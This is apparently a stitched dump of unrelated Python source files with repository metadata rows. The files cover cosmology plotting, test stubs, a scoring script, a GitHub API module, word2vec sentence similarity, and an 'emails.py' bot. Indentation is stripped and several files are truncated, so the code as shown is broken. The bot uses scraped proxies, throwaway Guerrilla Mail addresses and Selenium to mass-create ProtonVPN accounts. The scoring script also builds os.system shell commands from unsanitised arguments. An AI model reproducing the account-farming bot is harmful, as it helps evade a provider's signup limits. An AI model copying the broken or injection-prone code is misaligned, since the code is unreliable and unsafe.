npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
| 47.862637 | 120 | 0.662438 |
3c821672ff666bf16f14e39715a6449abc332ecc | 1,182 | py | Python | tests/integration/test_use_cases/test_18_confirm_purchase.py | datacraft-dsc/starfish-py | 95ff24410f056e8e2d313c3af97439fe003e294a | [
"Apache-2.0"
] | 4 | 2019-02-08T03:47:36.000Z | 2019-10-17T21:45:23.000Z | tests/integration/test_use_cases/test_18_confirm_purchase.py | datacraft-dsc/starfish-py | 95ff24410f056e8e2d313c3af97439fe003e294a | [
"Apache-2.0"
] | 81 | 2019-02-09T01:01:51.000Z | 2020-07-01T08:35:07.000Z | tests/integration/test_use_cases/test_18_confirm_purchase.py | oceanprotocol/ocean-py | 318ad0de2519e61d0a301c040a48d1839cd82425 | [
"Apache-2.0"
] | 1 | 2021-01-28T12:14:03.000Z | 2021-01-28T12:14:03.000Z | """
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been sucessfully puchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
| 35.818182 | 91 | 0.764805 |
3c8705d494d8a3a52f621df0705a17180cb44780 | 1,230 | py | Python | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | 1 | 2015-11-06T00:46:56.000Z | 2015-11-06T00:46:56.000Z | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | null | null | null | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | null | null | null | from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
| 29.285714 | 68 | 0.669919 |
3c8be6bc259868341293934801c28e199c01bfba | 1,539 | py | Python | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
| 23.676923 | 80 | 0.59974 |
3c8c318c871167bf3f056e1a05ea008558ab1c56 | 78 | py | Python | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | 1 | 2020-11-05T23:40:02.000Z | 2020-11-05T23:40:02.000Z | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | 3 | 2020-11-05T23:46:34.000Z | 2020-11-12T22:42:12.000Z | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | null | null | null | from volga.json import foo_test
| 13 | 31 | 0.692308 |
3c8d359a9fdb99a983fada9faf82eacea1c12723 | 11,067 | py | Python | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 5 | 2020-04-03T13:57:07.000Z | 2022-03-11T03:20:14.000Z | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 2 | 2020-10-15T20:26:44.000Z | 2021-05-29T09:36:10.000Z | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 5 | 2020-04-03T13:57:08.000Z | 2022-01-23T08:52:16.000Z | # This Project is in it's early stages of Development.
# Working on new features and main menu.
# Any Questions or Suggestions please Mail to: hendriksdevmail@gmail.com
# Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
# Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# verifymail = input('\033[31m' + "Enter Email Adress for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
# Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# notifymail = input('\033[31m' + "Enter Email Adress for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
email = email_driver.find_element_by_id('inbox-id').text + '@';
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
url = 'http://account.protonvpn.com/signup'
#url =
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
print ('\033[31m' + "Your New Email Adress is: ", rngusername,"@protonmail.com", sep='' + '\033[0m')
print ('\033[31m' + "Your New Email Password is: " + '\033[0m' , rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
print ('Please try verifing and try again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
restart ++ 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331 | 218 | 0.539893 |
3c8d3ed266d844941e1c8f372146b0d80fbb53f5 | 1,491 | py | Python | fixation/configuration.py | deepy/fix-template | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | null | null | null | fixation/configuration.py | deepy/fix-template | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | 9 | 2018-05-10T19:04:03.000Z | 2018-06-09T18:10:06.000Z | fixation/configuration.py | deepy/fixation | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | null | null | null | from fixation.models import get_id, Message, MsgContent, Component, Field, Enum
import os
| 35.5 | 112 | 0.627096 |
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a | 4,201 | py | Python | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | 2 | 2021-06-09T20:55:17.000Z | 2021-11-03T03:07:37.000Z | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | null | null | null | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | 1 | 2020-07-26T02:31:38.000Z | 2020-07-26T02:31:38.000Z |
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model1['resume'] -> This will return NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053 | 191 | 0.615092 |
3c8f07d1d3e0d5bb32a801e512cab31d3aca91cc | 134 | py | Python | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | 1 | 2021-09-28T13:11:56.000Z | 2021-09-28T13:11:56.000Z | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | null | null | null | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | null | null | null | lista = []
x = 0
while x != 999:
x = int(input('Numero: '))
if x not in lista:
lista.append(x)
lista.sort()
print(lista)
| 11.166667 | 28 | 0.559701 |
3c8f9f7ee5923a773fc310335335a5650e8aeefb | 12,399 | py | Python | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 8 | 2021-09-22T21:06:13.000Z | 2022-03-27T09:52:55.000Z | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 6 | 2021-07-30T09:35:01.000Z | 2022-03-30T13:16:03.000Z | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 2 | 2021-08-14T10:45:37.000Z | 2021-11-20T12:41:13.000Z | """
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
| 46.092937 | 234 | 0.583595 |
3c9056dfb6354e5daafd7bffd768de97d7f13f54 | 11,790 | py | Python | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
